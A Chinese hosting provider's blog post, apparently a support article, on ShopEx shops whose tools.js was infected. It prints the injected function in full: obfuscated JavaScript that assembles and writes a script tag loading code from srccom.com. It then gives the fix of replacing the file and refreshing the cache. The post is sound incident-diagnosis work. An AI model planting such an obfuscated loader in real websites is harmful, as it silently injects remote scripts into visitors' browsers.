香港独立IP空间
香港php空间
美国php空间
域名注册

大家都知道shopex是一款开源的程序。很多做电商的站长的朋友们都是使用的这个开源程序。但是开源的程序有很多bug,黑客就是瞅准了这些漏洞进行攻击。其中有一种,攻击的对象就是js文件。今天小编就遇到了一个站长朋友的网站受到这样的攻击。js文件里包含了恶意代码,从而触发了恶意访问请求。

无忧主机小编在分析客户网站访问时,发现网站加载特别慢,原因是加载了以下链接:

srccom.com/SRC.SRC

而这个链接,单独访问是无法访问的。也就是说由于这个无法访问的链接程序一直在进行调用,但是调用失败出现pending响应返回,导致加载缓慢。根据链接调用分析,报错来自于tools.js文件。粗略查看程序发现tools.js中并没有恶意URL的关键字。无忧主机小编把客户的tools.js文件下载到本地,仔细对比shopex开源源码的tools.js,发现文件中被植入了一段恶意函数,函数代码如下:

function CurrentXmlFrmFocus(){

var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];

var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];

var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];

var strgAttribute=”";

ardPopOpacity=ardPopOpacity.concat(arnElement);

for(var i=0;i<ardPopOpacity.length;i++) strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split(“”).reverse().join(“”);

document.writeln(strgAttribute);

}

具体的解决方案如下:

找到网站根目录下的statics/script/tools.js文件,使用shopex最新安装包中的JS文件上传替换它!

 

按照以上发法替换后,到网站后台更新下缓存就可以解决。最近shopex中此问题爆发比较频繁,希望此文能引起shopex站长们的重视,也希望这篇技术文章能帮到遇到同样问题的站长们。

相关文章推荐阅读:

解决SHOPEX添加商品无法上传商品图片的方法

SHOPEX去除底部版权信息“POWERED BY SHOPEX V4.8.5 ”

解决SHOPEX打开网页一直加载EC.PINGTCSS.QQ.COM的方法

 

 

本文地址:http://www.51php.com/shopex/13741.html

喜欢本文或觉得本文对您有帮助,请分享给您的朋友 ^_^

阅读本文的人还阅读:


搜索技术文档